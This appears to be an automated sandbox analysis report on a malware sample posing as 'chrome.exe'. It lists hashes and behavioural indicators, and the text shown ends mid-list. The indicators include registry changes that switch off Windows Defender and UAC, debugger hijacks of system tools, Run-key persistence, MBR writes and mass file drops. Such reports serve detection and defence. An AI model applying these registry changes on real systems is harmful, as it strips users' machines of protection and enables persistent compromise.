Resubmissions
02/04/2025, 19:18
250402-x1fajsvmt9 1022/03/2025, 04:45
250322-fdd1jaxzax 1022/03/2025, 04:32
250322-e5x22sxydw 1022/03/2025, 01:50
250322-b9qa8ayrs5 10Analysis
-
max time kernel
290s -
max time network
595s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
22/03/2025, 04:32
Static task
static1
Behavioral task
behavioral1
Sample
chrome.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
chrome.exe
-
Size
4.1MB
-
MD5
d162022a4f77fe568e3644c8ddccfc91
-
SHA1
940b43d35e0bd31d108b5758339494e1b990ac21
-
SHA256
780044208370ddc653095749d6e17ba029364d169891c8fcf2ff10974e0800ab
-
SHA512
81db20a0cf1ba119769a86b1c24a1106a2a13c0dd4c42285128cd506c385e596466f5bafae196ec22187fbd729eb5167295b6d9850d04d92c1c67540bba8573e
-
SSDEEP
98304:bhmbefkYYSmghDECMUVXhxEt3/PGrcFEXdA+Sif2g07:bf8YbmGlhVmv+r1XyNi+g07
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
Modifies Windows Defender notification settings 3 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 49 4516 powershell.exe 56 7000 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 12 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
pid Process 4516 powershell.exe 7000 powershell.exe 6056 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools reg.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD reg.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 56 7000 powershell.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\Debugger reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger\ = "C:\\Windows\\System32\\sex.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe reg.exe -
Modifies Windows Firewall 2 TTPs 7 IoCs
pid Process 5048 netsh.exe 5088 netsh.exe 3880 netsh.exe 6048 netsh.exe 3864 netsh.exe 2940 netsh.exe 5576 netsh.exe -
Possible privilege escalation attempt 8 IoCs
pid Process 6316 icacls.exe 2320 takeown.exe 3328 icacls.exe 5072 takeown.exe 3648 icacls.exe 4288 takeown.exe 4496 icacls.exe 6872 takeown.exe -
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4996 attrib.exe 4504 attrib.exe 4476 attrib.exe 3796 attrib.exe 456 attrib.exe 1644 attrib.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation chinah.exe -
Executes dropped EXE 2 IoCs
pid Process 3440 chinah.exe 5848 AgreementViewer.exe -
Loads dropped DLL 3 IoCs
pid Process 3440 chinah.exe 3440 chinah.exe 5848 AgreementViewer.exe -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 3328 icacls.exe 5072 takeown.exe 3648 icacls.exe 4288 takeown.exe 4496 icacls.exe 6872 takeown.exe 6316 icacls.exe 2320 takeown.exe -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description flow ioc pid Process Destination IP 59 208.67.222.222 6180 nslookup.exe Destination IP 60 208.67.222.222 6180 nslookup.exe Destination IP 61 208.67.222.222 6180 nslookup.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123.vbs = "c:\\123.vbs" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mbr.exe = "C:\\Windows\\N3OS3X3R\\mbr.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1234.vbs = "c:\\1234.vbs" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gay.bat = "c:\\gay.bat" reg.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\G: cleanmgr.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\D: cleanmgr.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\E: certreq.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\N: cleanmgr.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: certreq.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\H: cleanmgr.exe File opened (read-only) \??\Q: cleanmgr.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\O: cleanmgr.exe File opened (read-only) \??\R: cleanmgr.exe File opened (read-only) \??\U: cleanmgr.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\K: cleanmgr.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\B: cleanmgr.exe File opened (read-only) \??\M: cleanmgr.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\D: WScript.exe File opened (read-only) \??\H: WScript.exe File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\J: cleanmgr.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\P: cleanmgr.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\I: cleanmgr.exe File opened (read-only) \??\Z: cleanmgr.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\W: cleanmgr.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\A: cleanmgr.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\L: cleanmgr.exe File opened (read-only) \??\S: cleanmgr.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Modifies Security services 2 TTPs 5 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 chinah.exe File opened for modification \??\PHYSICALDRIVE0 chinah.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\System32\SwiftHackProtection20803.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection2923.scr cmd.exe File opened for modification C:\Windows\system32\lusrmgr.msc mmc.exe File created C:\Windows\System32\SwiftHackProtection13990.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection2685.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection14014.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection6348.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection30193.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection16650.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection16939.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection16686.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection26135.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection22103.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection12904.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection31732.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection25798.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection12593.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection8575.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection5318.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection2919.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection15759.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection22618.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection20789.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection26303.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection26135.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection27508.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection22638.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection22886.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection13184.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection16271.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection22164.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection3754.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection10593.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection11498.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection8834.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection2850.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection6040.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection29691.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection21042.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection29020.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection25496.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection16893.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection17583.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection15282.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection19513.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection1511.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection10784.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection16659.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection12641.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection16650.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection20795.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection3695.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection20567.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection17727.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection7485.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection6272.scr cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection8543.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection970.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection21536.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection5634.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection3560.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection28999.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection25316.scr cmd.exe File created C:\Windows\System32\SwiftHackProtection1957.scr cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.jpg" powershell.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\SwiftHackProtection19514.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection24954.scr cmd.exe File created C:\Program Files\SwiftHackProtection32485.scr cmd.exe File created C:\Program Files\SwiftHackProtection29636.scr cmd.exe File created C:\Program Files\SwiftHackProtection11217.scr cmd.exe File created C:\Program Files\SwiftHackProtection23190.scr cmd.exe File created C:\Program Files\SwiftHackProtection22247.scr cmd.exe File created C:\Program Files\SwiftHackProtection14678.scr cmd.exe File created C:\Program Files\SwiftHackProtection23357.scr cmd.exe File created C:\Program Files\SwiftHackProtection7957.scr cmd.exe File created C:\Program Files\SwiftHackProtection1725.scr cmd.exe File created C:\Program Files\SwiftHackProtection15155.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection3511.scr cmd.exe File created C:\Program Files\SwiftHackProtection15462.scr cmd.exe File created C:\Program Files\SwiftHackProtection20195.scr cmd.exe File created C:\Program Files\SwiftHackProtection16529.scr cmd.exe File created C:\Program Files\SwiftHackProtection5243.scr cmd.exe File created C:\Program Files\SwiftHackProtection7223.scr cmd.exe File created C:\Program Files\SwiftHackProtection32216.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection11436.scr cmd.exe File created C:\Program Files\SwiftHackProtection30492.scr cmd.exe File created C:\Program Files\SwiftHackProtection16516.scr cmd.exe File created C:\Program Files\SwiftHackProtection1187.scr cmd.exe File created C:\Program Files\SwiftHackProtection13759.scr cmd.exe File created C:\Program Files\SwiftHackProtection23121.scr cmd.exe File created C:\Program Files\SwiftHackProtection9304.scr cmd.exe File created C:\Program Files\SwiftHackProtection19807.scr cmd.exe File created C:\Program Files\SwiftHackProtection12860.scr cmd.exe File created C:\Program Files\SwiftHackProtection19981.scr cmd.exe File created C:\Program Files\SwiftHackProtection886.scr cmd.exe File created C:\Program Files\SwiftHackProtection23320.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection19304.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection17856.scr cmd.exe File created C:\Program Files\SwiftHackProtection31004.scr cmd.exe File created C:\Program Files\SwiftHackProtection9700.scr cmd.exe File created C:\Program Files\SwiftHackProtection10746.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection18477.scr cmd.exe File created C:\Program Files\SwiftHackProtection15703.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection27493.scr cmd.exe File created C:\Program Files\SwiftHackProtection21816.scr cmd.exe File created C:\Program Files\SwiftHackProtection17433.scr cmd.exe File created C:\Program Files\SwiftHackProtection19297.scr cmd.exe File created C:\Program Files\SwiftHackProtection22579.scr cmd.exe File created C:\Program Files\SwiftHackProtection16508.scr cmd.exe File created C:\Program Files\SwiftHackProtection17545.scr cmd.exe File created C:\Program Files\SwiftHackProtection9462.scr cmd.exe File created C:\Program Files\SwiftHackProtection14975.scr 